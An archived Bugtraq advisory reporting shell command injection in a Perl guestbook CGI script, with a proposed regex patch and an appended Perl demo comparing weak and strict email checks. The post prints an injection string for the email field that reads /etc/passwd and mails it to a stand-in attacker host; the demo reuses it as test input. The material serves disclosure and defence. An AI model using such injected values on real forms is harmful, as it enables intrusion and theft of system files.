Bugtraq mailing list archives
cgi vulnerability
From: "supdavid" <supdavid () bluewin ch>
Date: Tue, 30 Oct 2001 16:04:23 +0100
hi all

I found a security hole in Book of guests and Post it! written by Seth Leonard. It is available at http://www.dreamcachersweb.com

The problem is that this script doesn't filter out ANY metacharacters from the input and passes it to the shell. Therefore by writing something like

    email () mail com;cat /etc/passwd|mail evil () evilhost com

into the email field, the attacker could take control over the host.

patch: first of all it isn't a bad idea to set the permissions of the script correctly. Furthermore the line

    if ($INPUT{'email'} =~ /(.*)@(.*)/) { ... }

should be replaced by something like

    if ($INPUT{'email'} =~ /^[\w.-]+\@[\w.-]+$/) { ... }

David Kumme, 16
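
The two checks from the post side by side, as an added example that is not part of the original message or of the script it describes: the unanchored test accepts any input containing an "@", while an anchored whitelist rejects everything else. The sample inputs are constructed, and weak_check, strict_check, send_notice and the sendmail path are assumptions, since the script's own mail call is not shown in the post.

```perl
#!/usr/bin/perl
use strict;
use warnings;

# Test quoted in the post as the script's original check: unanchored, so any
# string that contains an "@" passes, shell metacharacters included.
sub weak_check {
    my ($addr) = @_;
    return $addr =~ /(.*)\@(.*)/ ? 1 : 0;
}

# Whitelist in the spirit of the proposed patch, anchored with \A and \z.
# Unlike $, \z does not tolerate a trailing newline.
sub strict_check {
    my ($addr) = @_;
    return defined $addr && $addr =~ /\A[\w.-]+\@[\w.-]+\z/ ? 1 : 0;
}

# Hypothetical mail hand-off (defined but not called in this demo).
# List-form open execs the mailer directly, so no shell parses the input.
# With -t the recipient is read from the To: header, so an address that
# starts with "-" is never seen as a command-line option.
sub send_notice {
    my ($addr, $body) = @_;
    return 0 unless strict_check($addr);
    my $mailer = '/usr/sbin/sendmail';    # assumed path
    open(my $mail, '|-', $mailer, '-oi', '-t') or return 0;
    print {$mail} "To: $addr\nSubject: Guestbook entry\n\n$body\n";
    return close($mail) ? 1 : 0;
}

# Constructed sample inputs; the second is modelled on the string in the post.
my @samples = (
    'visitor@example.com',
    'email@example.com;cat /etc/passwd|mail x@example.net',
    "visitor\@example.com\n",
);

printf "%-6s %-6s %s\n", 'weak', 'strict', 'input';
for my $s (@samples) {
    (my $shown = $s) =~ s/\n/\\n/g;    # make the newline visible
    printf "%-6s %-6s %s\n",
        (weak_check($s)   ? 'accept' : 'reject'),
        (strict_check($s) ? 'accept' : 'reject'),
        $shown;
}
```
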